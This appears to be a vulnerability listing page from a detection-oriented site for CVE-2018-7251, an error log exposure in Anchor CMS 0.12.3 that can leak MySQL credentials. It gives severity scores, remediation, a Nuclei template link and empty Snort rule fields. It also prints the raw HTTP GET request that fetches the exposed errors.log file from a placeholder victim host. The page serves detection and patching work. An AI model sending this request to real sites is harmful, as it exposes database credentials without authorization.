🔙 목록으로 돌아가기

CVE-2018-7251: Anchor CMS 0.12.3 - Error Log Exposure

TitleAnchor CMS 0.12.3 - Error Log Exposure
Authorpdteam
SeverityCritical
ImpactAn attacker can gain access to sensitive information, such as usernames, passwords, and system configuration details.
RemediationUpgrade to the latest version of Anchor CMS or apply the necessary patches to fix the error log exposure vulnerability.
CVSS Score9.8
EPSS Score0.9088
CVE IDCVE-2018-7251
CWE IDCWE-200
Tags cve cve2018 anchorcms logs error packetstorm vuln

🔍 Vulnerability Description

Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as “Too many connections”) has occurred.

🌐 HTTP Request

GET /anchor/errors.log HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7251.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-7251.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A